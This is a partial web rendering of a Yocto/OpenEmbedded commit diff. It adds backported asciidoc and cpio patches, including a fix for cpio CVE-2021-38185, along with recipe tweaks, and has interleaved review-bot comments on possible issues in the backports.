Diffstat (limited to 'meta/recipes-extended')
133 files changed, 6898 insertions, 53 deletions
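--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
+From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
+Date: Fri, 30 Oct 2020 15:10:35 +0100
+Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
+
+Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
+
+Slightly modified to cleanly apply to asciidoc 8.6.9:
+- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
+- line numbers corrected to eliminate offset warnings
+
+Upstream-Status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+asciidoc.py | 6 +++---
+1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/asciidoc.py b/asciidoc.py
+index f960e7d8..42868c4b 100755
+--- a/asciidoc.py
++++ b/asciidoc.py
+@@ -30,7 +30,7 @@
+# Used by asciidocapi.py #
+VERSION = '8.6.10' # See CHANGELOG file for version history.
+
+-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better.
++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better.
+
+# ---------------------------------------------------------------------------
+# Program constants.
+@@ -4704,8 +4704,8 @@ def init(self, cmd):
+directory.
+cmd is the asciidoc command or asciidoc.py path.
+"""
+- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
+- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
++ if sys.version_info[:2] < MIN_PYTHON_VERSION:
++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
+sys.exit(1)
+if not os.path.exists(cmd):
+message.stderr('FAILED: Missing asciidoc command: %s' % cmd)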
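Review bot: `MIN_PYTHON_VERSION` changes from a string to a tuple directly under the `# Used by asciidocapi.py #` banner, so any other reader of the constant that still calls `float(MIN_PYTHON_VERSION)` would now raise `TypeError`. The patch touches only `asciidoc.py`, so whether such a reader exists in the pinned tree is not visible here and should be checked before relying on the backport. The patch header also says VERSION was adjusted to reflect 8.6.9 while the context line reads `VERSION = '8.6.10'`; a word in the header on which value is intended would avoid confusion. The body of `init` continues outside the hunk.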
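--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
 file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
 
-SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \
-file://auto-catalogs.patch"
+SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
+file://auto-catalogs.patch \
+file://detect-python-version.patch"
 SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
 PV .= "+py3-git${SRCPV}"
 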
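Review bot: `SRC_URI` now fetches from a differently named repository (`asciidoc-py3` becomes `asciidoc-py`, with `branch=main`) while `SRCREV` is unchanged, so what gets built depends on that pinned hash being reachable from `main` at the new location. That cannot be confirmed from this page and is worth verifying with a clean fetch. If this follows an upstream rename, a comment above `SRC_URI` such as `# upstream repository renamed from asciidoc-py3` would record why the fetch location changed for later audits.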
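--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
 SUMMARY = "An sh-compatible command language interpreter"
 HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
+DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
 SECTION = "base/shell"
 
 DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
 oe_runmake buildtest
 }
 
+do_install_prepend () {
+# Ensure determinism as this counter increases for each make call
+rm -f ${B}/.build
+}
+
 do_install_append () {
 # Move /usr/bin/bash to /bin/bash, if need
 if [ "${base_bindir}" != "${bindir}" ]; then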
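--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Arbitrary precision calculator language"
 HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
+DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
 
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
 ALTERNATIVE_${PN} = "bc dc"
 ALTERNATIVE_PRIORITY = "100"
 
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"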
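--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
 
 lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
 
 libbz2_la_SOURCES = blocksort.c \
 huffman.c \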
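--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
+From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 7 Apr 2023 11:23:37 +0300
+Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
+
+* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
+Rewrite the reading loop.
+
+Original patch by Stefano Babic <sbabic@denx.de>
+
+Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+src/copyout.c | 16 +++++++---------
+1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..f1ff351 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -34,27 +34,25 @@
+compute and return a checksum for them. */
+
+static uint32_t
+-read_for_checksum (int in_file_des, int file_size, char *file_name)
++read_for_checksum (int in_file_des, off_t file_size, char *file_name)
+{
+uint32_t crc;
+- char buf[BUFSIZ];
+- int bytes_left;
+- int bytes_read;
+- int i;
++ unsigned char buf[BUFSIZ];
++ ssize_t bytes_read;
++ ssize_t i;
+
+crc = 0;
+
+- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
++ while (file_size > 0)
+{
+bytes_read = read (in_file_des, buf, BUFSIZ);
+if (bytes_read < 0)
+error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+if (bytes_read == 0)
+break;
+- if (bytes_left < bytes_read)
+- bytes_read = bytes_left;
+- for (i = 0; i < bytes_read; ++i)
++ for (i = 0; i < bytes_read; i++)
+crc += buf[i] & 0xff;
++ file_size -= bytes_read;
+}
+if (lseek (in_file_des, 0L, SEEK_SET))
+error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+--
+2.39.2
+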
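Review bot: The rewritten loop in `read_for_checksum` no longer clamps the final chunk to the bytes still outstanding: the removed `if (bytes_left < bytes_read) bytes_read = bytes_left;` has no counterpart, so when `read` returns more than the remaining `file_size` (a file that grew after its size was recorded) the surplus bytes are summed into `crc`. If the archive body is later written using the recorded size, which happens outside this patch, the stored checksum would not match the stored data. Restoring the bound before the summing loop keeps the old behaviour: `if (bytes_read > file_size) bytes_read = file_size;`. With `buf` now `unsigned char` the `& 0xff` mask is redundant but harmless. The tail of the function lies outside the hunk.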
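--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
+From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 28 Apr 2023 15:23:46 +0300
+Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
+
+* src/extern.h (last_header_start): Change type to off_t.
+* src/global.c: Likewise.
+* src/util.c (prepare_append): Use off_t for file offsets.
+
+Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+src/extern.h | 11 ++++-----
+src/global.c | 2 +-
+src/util.c | 66 ++++++++++++++++++++++++++--------------------------
+3 files changed, 39 insertions(+), 40 deletions(-)
+
+diff --git a/src/extern.h b/src/extern.h
+index 11ac6bf..12f14a9 100644
+--- a/src/extern.h
++++ b/src/extern.h
+@@ -67,7 +67,7 @@ extern int ignore_devno_option;
+
+extern bool to_stdout_option;
+
+-extern int last_header_start;
++extern off_t last_header_start;
+extern int copy_matching_files;
+extern int numeric_uid;
+extern char *pattern_file_name;
+@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
+
+/* copypass.c */
+void process_copy_pass (void);
+-int link_to_maj_min_ino (char *file_name, int st_dev_maj,
++int link_to_maj_min_ino (char *file_name, int st_dev_maj,
+int st_dev_min, ino_t st_ino);
+int link_to_name (char const *link_name, char const *link_target);
+
+@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
+void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
+void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
+void warn_if_file_changed (char *file_name, off_t old_file_size,
+- time_t old_file_mtime);
++ time_t old_file_mtime);
+void create_all_directories (char const *name);
+void prepare_append (int out_file_des);
+char *find_inode_file (ino_t node_num,
+@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
+#ifdef HPUX_CDF
+char *add_cdf_double_slashes (char *filename);
+#endif
+-void write_nuls_to_file (off_t num_bytes, int out_des,
++void write_nuls_to_file (off_t num_bytes, int out_des,
+void (*writer) (char *in_buf,
+int out_des, off_t num_bytes));
+#define DISK_IO_BLOCK_SIZE 512
+@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
+mode_t invert_permissions);
+int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
+void apply_delayed_set_stat (void);
+-
+-int arf_stores_inode_p (enum archive_format arf);
+
++int arf_stores_inode_p (enum archive_format arf);
+diff --git a/src/global.c b/src/global.c
+index fb3abe9..5c9fc05 100644
+--- a/src/global.c
++++ b/src/global.c
+@@ -114,7 +114,7 @@ int debug_flag = false;
+
+/* File position of last header read. Only used during -A to determine
+where the old TRAILER!!! record started. */
+-int last_header_start = 0;
++off_t last_header_start = 0;
+
+/* With -i; if true, copy only files that match any of the given patterns;
+if false, copy only files that do not match any of the patterns. (-f) */
+diff --git a/src/util.c b/src/util.c
+index 4421b20..3be89a4 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
+static long output_bytes_before_lseek = 0;
+
+/* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+seek pointer and prevent it from overflowing. */
+if (output_is_special
+&& ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
+@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
+descriptor OUT_DES and reset `output_size' and `out_buff'.
+If `swapping_halfwords' or `swapping_bytes' is set,
+do the appropriate swapping first. Our callers have
+- to make sure to only set these flags if `output_size'
++ to make sure to only set these flags if `output_size'
+is appropriate (a multiple of 4 for `swapping_halfwords',
+2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE
+must always be a multiple of 4 helps us (and our callers)
+@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
+{
+#ifdef BROKEN_LONG_TAPE_DRIVER
+/* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+seek pointer and prevent it from overflowing. */
+if (input_is_special
+&& ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
+
+#ifdef BROKEN_LONG_TAPE_DRIVER
+/* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+seek pointer and prevent it from overflowing. */
+if (input_is_special
+&& ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
+
+if (crc_i_flag && only_verify_crc_flag)
+{
+- int k;
++ int k;
+for (k = 0; k < space_left; ++k)
+crc += in_buff[k] & 0xff;
+}
+@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
+}
+
+void
+-write_nuls_to_file (off_t num_bytes, int out_des,
+- void (*writer) (char *in_buf, int out_des, off_t num_bytes))
++write_nuls_to_file (off_t num_bytes, int out_des,
++ void (*writer) (char *in_buf, int out_des, off_t num_bytes))
+{
+off_t blocks;
+off_t extra_bytes;
+off_t i;
+static char zeros_512[512];
+-
++
+blocks = num_bytes / sizeof zeros_512;
+extra_bytes = num_bytes % sizeof zeros_512;
+for (i = 0; i < blocks; ++i)
+@@ -603,7 +603,7 @@ create_all_directories (char const *name)
+char *dir;
+
+dir = dir_name (name);
+-
++
+if (dir == NULL)
+error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
+
+@@ -637,9 +637,9 @@ create_all_directories (char const *name)
+void
+prepare_append (int out_file_des)
+{
+- int start_of_header;
+- int start_of_block;
+- int useful_bytes_in_block;
++ off_t start_of_header;
++ off_t start_of_block;
++ size_t useful_bytes_in_block;
+char *tmp_buf;
+
+start_of_header = last_header_start;
+@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
+const struct inode_val *ival1 = val1;
+const struct inode_val *ival2 = val2;
+return ival1->inode == ival2->inode
+- && ival1->major_num == ival2->major_num
+- && ival1->minor_num == ival2->minor_num;
++ && ival1->major_num == ival2->major_num
++ && ival1->minor_num == ival2->minor_num;
+}
+
+static struct inode_val *
+@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
+unsigned long minor_num)
+{
+struct inode_val sample;
+-
++
+if (!hash_table)
+return NULL;
+-
++
+sample.inode = node_num;
+sample.major_num = major_num;
+sample.minor_num = minor_num;
+@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
+{
+struct inode_val *temp;
+struct inode_val *e = NULL;
+-
++
+/* Create new inode record. */
+temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
+temp->inode = node_num;
+@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
+
+/* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
+create holes instead of writing blockfuls of zeros.
+-
++
+Return the number of bytes written (including bytes in zero
+regions) on success, -1 on error.
+
+@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+
+enum { begin, in_zeros, not_in_zeros } state =
+delayed_seek_count ? in_zeros : begin;
+-
++
+while (nbytes)
+{
+size_t rest = nbytes;
+@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+if (state == not_in_zeros)
+{
+ssize_t bytes = buf - start_ptr + rest;
+-
++
+n = write (fildes, start_ptr, bytes);
+if (n == -1)
+return -1;
+@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+if (n != 1)
+return n;
+delayed_seek_count = 0;
+- }
+-
++ }
++
+return nwritten + seek_count;
+}
+
+@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
+if (!no_chown_flag)
+{
+uid_t uid = CPIO_UID (header->c_uid);
+- gid_t gid = CPIO_GID (header->c_gid);
++ gid_t gid = CPIO_GID (header->c_gid);
+if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
+&& errno != EPERM)
+chown_error_details (header->c_name, uid, gid);
+@@ -1239,13 +1239,13 @@ set_file_times (int fd,
+const char *name, unsigned long atime, unsigned long mtime)
+{
+struct timespec ts[2];
+-
++
+memset (&ts, 0, sizeof ts);
+
+ts[0].tv_sec = atime;
+ts[1].tv_sec = mtime;
+
+- /* Silently ignore EROFS because reading the file won't have upset its
++ /* Silently ignore EROFS because reading the file won't have upset its
+timestamp if it's on a read-only filesystem. */
+if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
+utime_error (name);
+@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
+
+/* This is a simplified form of delayed set_stat used by GNU tar.
+With the time, both forms will merge and pass to paxutils
+-
++
+List of directories whose statuses we need to extract after we've
+finished extracting their subsidiary files. If you consider each
+contiguous subsequence of elements of the form [D]?[^D]*, where [D]
+@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
+{
+int rc;
+mode_t mode = file_hdr->c_mode;
+-
++
+if (!(file_hdr->c_mode & S_IWUSR))
+{
+rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
+@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
+{
+int res; /* Result of various function calls. */
+int setstat_delayed = 0;
+-
++
+if (to_stdout_option)
+return 0;
+-
++
+/* Strip any trailing `/'s off the filename; tar puts
+them on. We might as well do it here in case anybody
+else does too, since they cause strange things to happen. */
+@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
+}
+return 1;
+}
+-
++
+void
+cpio_file_stat_init (struct cpio_file_stat *file_hdr)
+{
+--
+2.39.2
+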
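Review bot: The patch header does not say that only three places in this backport change types: `last_header_start` in src/extern.h and src/global.c, and the three locals of `prepare_append` in src/util.c. The remaining hunks appear to be whitespace or blank-line changes, since their removed and added lines read identically in this rendering. A header line such as `Only the last_header_start and prepare_append hunks are functional; the rest is upstream whitespace cleanup` would let an auditor go straight to the offset handling. `prepare_append` continues outside its hunk, so the expressions that combine the new `off_t` offsets with the `size_t` `useful_bytes_in_block` are not visible here and should be read in the patched tree.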
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch new file mode 100644 index 0000000000..6ceafeee49 --- /dev/null +++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch | |||
@@ -0,0 +1,581 @@ | |||
1 | GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted | ||
2 | pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers | ||
3 | an out-of-bounds heap write. | ||
4 | |||
5 | CVE: CVE-2021-38185 | ||
6 | Upstream-Status: Backport | ||
7 | Signed-off-by: Ross Burton <ross.burton@arm.com> | ||
8 | |||
9 | From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001 | ||
10 | From: Sergey Poznyakoff <gray@gnu.org> | ||
11 | Date: Sat, 7 Aug 2021 12:52:21 +0300 | ||
12 | Subject: [PATCH 1/3] Rewrite dynamic string support. | ||
13 | |||
14 | * src/dstring.c (ds_init): Take a single argument. | ||
15 | (ds_free): New function. | ||
16 | (ds_resize): Take a single argument. Use x2nrealloc to expand | ||
17 | the storage. | ||
18 | (ds_reset,ds_append,ds_concat,ds_endswith): New function. | ||
19 | (ds_fgetstr): Rewrite. In particular, this fixes integer overflow. | ||
20 | * src/dstring.h (dynamic_string): Keep both the allocated length | ||
21 | (ds_size) and index of the next free byte in the string (ds_idx). | ||
22 | (ds_init,ds_resize): Change signature. | ||
23 | (ds_len): New macro. | ||
24 | (ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos. | ||
25 | * src/copyin.c: Use new ds_ functions. | ||
26 | * src/copyout.c: Likewise. | ||
27 | * src/copypass.c: Likewise. | ||
28 | * src/util.c: Likewise. | ||
29 | --- | ||
30 | src/copyin.c | 40 +++++++++++------------ | ||
31 | src/copyout.c | 16 ++++----- | ||
32 | src/copypass.c | 34 +++++++++---------- | ||
33 | src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++-------------- | ||
34 | src/dstring.h | 31 +++++++++--------- | ||
35 | src/util.c | 6 ++-- | ||
36 | 6 files changed, 123 insertions(+), 92 deletions(-) | ||
37 | |||
38 | diff --git a/src/copyin.c b/src/copyin.c | ||
39 | index b29f348..37e503a 100644 | ||
40 | --- a/src/copyin.c | ||
41 | +++ b/src/copyin.c | ||
42 | @@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out, | ||
43 | char *str_res; /* Result for string function. */ | ||
44 | static dynamic_string new_name; /* New file name for rename option. */ | ||
45 | static int initialized_new_name = false; | ||
46 | + | ||
47 | if (!initialized_new_name) | ||
48 | - { | ||
49 | - ds_init (&new_name, 128); | ||
50 | - initialized_new_name = true; | ||
51 | - } | ||
52 | + { | ||
53 | + ds_init (&new_name); | ||
54 | + initialized_new_name = true; | ||
55 | + } | ||
56 | |||
57 | if (rename_flag) | ||
58 | { | ||
59 | @@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name) | ||
60 | already in `save_patterns' (from the command line) are preserved. */ | ||
61 | |||
62 | static void | ||
63 | -read_pattern_file () | ||
64 | +read_pattern_file (void) | ||
65 | { | ||
66 | - int max_new_patterns; | ||
67 | - char **new_save_patterns; | ||
68 | - int new_num_patterns; | ||
69 | + char **new_save_patterns = NULL; | ||
70 | + size_t max_new_patterns; | ||
71 | + size_t new_num_patterns; | ||
72 | int i; | ||
73 | - dynamic_string pattern_name; | ||
74 | + dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER; | ||
75 | FILE *pattern_fp; | ||
76 | |||
77 | if (num_patterns < 0) | ||
78 | num_patterns = 0; | ||
79 | - max_new_patterns = 1 + num_patterns; | ||
80 | - new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *)); | ||
81 | new_num_patterns = num_patterns; | ||
82 | - ds_init (&pattern_name, 128); | ||
83 | + max_new_patterns = num_patterns; | ||
84 | + new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0])); | ||
85 | |||
86 | pattern_fp = fopen (pattern_file_name, "r"); | ||
87 | if (pattern_fp == NULL) | ||
88 | open_fatal (pattern_file_name); | ||
89 | while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL) | ||
90 | { | ||
91 | - if (new_num_patterns >= max_new_patterns) | ||
92 | - { | ||
93 | - max_new_patterns += 1; | ||
94 | - new_save_patterns = (char **) | ||
95 | - xrealloc ((char *) new_save_patterns, | ||
96 | - max_new_patterns * sizeof (char *)); | ||
97 | - } | ||
98 | + if (new_num_patterns == max_new_patterns) | ||
99 | + new_save_patterns = x2nrealloc (new_save_patterns, | ||
100 | + &max_new_patterns, | ||
101 | + sizeof (new_save_patterns[0])); | ||
102 | new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string); | ||
103 | ++new_num_patterns; | ||
104 | } | ||
105 | + | ||
106 | + ds_free (&pattern_name); | ||
107 | + | ||
108 | if (ferror (pattern_fp) || fclose (pattern_fp) == EOF) | ||
109 | close_error (pattern_file_name); | ||
110 | |||
111 | @@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count) | ||
112 | in the file system. */ | ||
113 | |||
114 | void | ||
115 | -process_copy_in () | ||
116 | +process_copy_in (void) | ||
117 | { | ||
118 | char done = false; /* True if trailer reached. */ | ||
119 | FILE *tty_in = NULL; /* Interactive file for rename option. */ | ||
120 | diff --git a/src/copyout.c b/src/copyout.c | ||
121 | index 8b0beb6..26e3dda 100644 | ||
122 | --- a/src/copyout.c | ||
123 | +++ b/src/copyout.c | ||
124 | @@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) | ||
125 | The format of the header depends on the compatibility (-c) flag. */ | ||
126 | |||
127 | void | ||
128 | -process_copy_out () | ||
129 | +process_copy_out (void) | ||
130 | { | ||
131 | - dynamic_string input_name; /* Name of file read from stdin. */ | ||
132 | + dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; | ||
133 | + /* Name of file read from stdin. */ | ||
134 | struct stat file_stat; /* Stat record for file. */ | ||
135 | struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; | ||
136 | /* Output header information. */ | ||
137 | @@ -605,7 +606,6 @@ process_copy_out () | ||
138 | char *orig_file_name = NULL; | ||
139 | |||
140 | /* Initialize the copy out. */ | ||
141 | - ds_init (&input_name, 128); | ||
142 | file_hdr.c_magic = 070707; | ||
143 | |||
144 | /* Check whether the output file might be a tape. */ | ||
145 | @@ -657,14 +657,9 @@ process_copy_out () | ||
146 | { | ||
147 | if (file_hdr.c_mode & CP_IFDIR) | ||
148 | { | ||
149 | - int len = strlen (input_name.ds_string); | ||
150 | /* Make sure the name ends with a slash */ | ||
151 | - if (input_name.ds_string[len-1] != '/') | ||
152 | - { | ||
153 | - ds_resize (&input_name, len + 2); | ||
154 | - input_name.ds_string[len] = '/'; | ||
155 | - input_name.ds_string[len+1] = 0; | ||
156 | - } | ||
157 | + if (!ds_endswith (&input_name, '/')) | ||
158 | + ds_append (&input_name, '/'); | ||
159 | } | ||
160 | } | ||
161 | |||
162 | @@ -875,6 +870,7 @@ process_copy_out () | ||
163 | (unsigned long) blocks), (unsigned long) blocks); | ||
164 | } | ||
165 | cpio_file_stat_free (&file_hdr); | ||
166 | + ds_free (&input_name); | ||
167 | } | ||
168 | |||
169 | |||
170 | diff --git a/src/copypass.c b/src/copypass.c | ||
171 | index dc13b5b..62f31c6 100644 | ||
172 | --- a/src/copypass.c | ||
173 | +++ b/src/copypass.c | ||
174 | @@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) | ||
175 | If `link_flag', link instead of copying. */ | ||
176 | |||
177 | void | ||
178 | -process_copy_pass () | ||
179 | +process_copy_pass (void) | ||
180 | { | ||
181 | - dynamic_string input_name; /* Name of file from stdin. */ | ||
182 | - dynamic_string output_name; /* Name of new file. */ | ||
183 | + dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; | ||
184 | + /* Name of file from stdin. */ | ||
185 | + dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; | ||
186 | + /* Name of new file. */ | ||
187 | size_t dirname_len; /* Length of `directory_name'. */ | ||
188 | int res; /* Result of functions. */ | ||
189 | char *slash; /* For moving past slashes in input name. */ | ||
190 | @@ -65,25 +67,18 @@ process_copy_pass () | ||
191 | created files */ | ||
192 | |||
193 | /* Initialize the copy pass. */ | ||
194 | - ds_init (&input_name, 128); | ||
195 | |||
196 | dirname_len = strlen (directory_name); | ||
197 | if (change_directory_option && !ISSLASH (directory_name[0])) | ||
198 | { | ||
199 | char *pwd = xgetcwd (); | ||
200 | - | ||
201 | - dirname_len += strlen (pwd) + 1; | ||
202 | - ds_init (&output_name, dirname_len + 2); | ||
203 | - strcpy (output_name.ds_string, pwd); | ||
204 | - strcat (output_name.ds_string, "/"); | ||
205 | - strcat (output_name.ds_string, directory_name); | ||
206 | + | ||
207 | + ds_concat (&output_name, pwd); | ||
208 | + ds_append (&output_name, '/'); | ||
209 | } | ||
210 | - else | ||
211 | - { | ||
212 | - ds_init (&output_name, dirname_len + 2); | ||
213 | - strcpy (output_name.ds_string, directory_name); | ||
214 | - } | ||
215 | - output_name.ds_string[dirname_len] = '/'; | ||
216 | + ds_concat (&output_name, directory_name); | ||
217 | + ds_append (&output_name, '/'); | ||
218 | + dirname_len = ds_len (&output_name); | ||
219 | output_is_seekable = true; | ||
220 | |||
221 | change_dir (); | ||
222 | @@ -116,8 +111,8 @@ process_copy_pass () | ||
223 | /* Make the name of the new file. */ | ||
224 | for (slash = input_name.ds_string; *slash == '/'; ++slash) | ||
225 | ; | ||
226 | - ds_resize (&output_name, dirname_len + strlen (slash) + 2); | ||
227 | - strcpy (output_name.ds_string + dirname_len + 1, slash); | ||
228 | + ds_reset (&output_name, dirname_len); | ||
229 | + ds_concat (&output_name, slash); | ||
230 | |||
231 | existing_dir = false; | ||
232 | if (lstat (output_name.ds_string, &out_file_stat) == 0) | ||
233 | @@ -333,6 +328,9 @@ process_copy_pass () | ||
234 | (unsigned long) blocks), | ||
235 | (unsigned long) blocks); | ||
236 | } | ||
237 | + | ||
238 | + ds_free (&input_name); | ||
239 | + ds_free (&output_name); | ||
240 | } | ||
241 | |||
242 | /* Try and create a hard link from FILE_NAME to another file | ||
243 | diff --git a/src/dstring.c b/src/dstring.c | ||
244 | index e9c063f..358f356 100644 | ||
245 | --- a/src/dstring.c | ||
246 | +++ b/src/dstring.c | ||
247 | @@ -20,8 +20,8 @@ | ||
248 | #if defined(HAVE_CONFIG_H) | ||
249 | # include <config.h> | ||
